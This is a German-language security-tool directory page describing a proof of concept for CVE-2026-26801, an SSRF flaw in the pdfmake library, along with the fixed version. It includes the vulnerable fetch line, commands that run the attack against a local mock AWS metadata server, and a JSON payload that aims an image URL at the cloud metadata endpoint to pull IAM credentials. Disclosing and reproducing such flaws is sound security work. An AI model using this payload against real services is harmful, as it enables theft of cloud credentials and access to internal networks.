Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-26801-pdfmake-ssrf — PoC für CVE-2026-26801: SSRF in pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5) | Kitploit
Tools/GitHubGitHub/mariopepe/cve-2026-26801-pdfmake-ssrf
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubmariopepe/cve-2026-26801-pdfmake-ssrf

CVE-2026-26801-pdfmake-ssrf

PoC für CVE-2026-26801: SSRF in pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5)

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

pdfmake SSRF-Schwachstellen-PoC

Zusammenfassung der Schwachstelle

FeldWert
Paketpdfmake
Version>= 0.3.0-beta.2, <= 0.3.5
Behoben0.3.6
CVECVE-2026-26801
TypServer-Side Request Forgery (SSRF)
Ortsrc/URLResolver.js
SchweregradHOCH

Grundursache

root@kitploit:~
// URLResolver.js Zeile 3
const response = await fetch(url, { headers });  // KEINE VALIDIERUNG!

Wenn docDefinition URLs in images, attachments oder files enthält, ruft pdfmake diese ohne jegliche Validierung ab:

  • Keine Allowlist/Blocklist für Domains
  • Kein Schutz gegen interne IPs (127.0.0.1, 169.254.169.254, 10.x.x.x)
  • Benutzerdefinierte Header werden unterstützt (ermöglicht Auth-Bypass)

Reproduktion

Einrichtung

root@kitploit:~
npm install

Terminal 1 - Mock-AWS-Metadata-Server

root@kitploit:~
npm run metadata

Terminal 2 - Verwundbarer PDF-Server

root@kitploit:~
npm run server

Terminal 3 - Angriff ausführen

Blindes SSRF (beweist, dass der Server ausgehende Anfragen stellt):

root@kitploit:~
npm run attack

Vollständiges SSRF-Lesen (Anmeldedaten im generierten PDF eingebettet):

root@kitploit:~
npm run exfiltrate

Erwartete Ergebnisse

Blindes SSRF (npm run attack)

Metadata-Server-Ausgabe:

root@kitploit:~
[METADATA] GET /latest/meta-data/iam/security-credentials/vulnerable-ec2-role
[METADATA] >>> ANMELDEDATEN GELECKT! <<<

Dies beweist, dass der verwundbare Server eine ausgehende Anfrage an unseren kontrollierten Endpunkt gestellt hat.

Vollständiges SSRF-Lesen (npm run exfiltrate)

Das Angriffsskript generiert exfiltrated.pdf. Öffnen Sie es in einem beliebigen PDF-Viewer und die AWS-Anmeldedaten-JSON ist als Dateianhang (metadata.json) eingebettet. Dies beweist vollständige Datenextfiltration, nicht nur blindes SSRF. Der Angreifer erhält den tatsächlichen Antworttext innerhalb des PDFs zurück.

Auswirkungen in der Praxis

  1. AWS/GCP/Azure-Anmeldedatendiebstahl - Zugriff auf Cloud-Metadata-Endpunkte
  2. Interner Netzwerkzugriff - Erreichen interner Dienste
  3. Port-Scanning - Aufzählung interner Infrastruktur
  4. Auth-Bypass - Benutzerdefinierte Header zur Umgehung der Authentifizierung

Angriffs-Payload

root@kitploit:~
{
  "content": ["Hallo"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}

Writeup

Vollständiger technischer Writeup mit der Geschichte, wie dies gefunden wurde, der Angriffskette und dem Offenlegungszeitplan: mariopepe.github.io/cve-2026-26801-pdfmake-ssrf

Tool herunterladen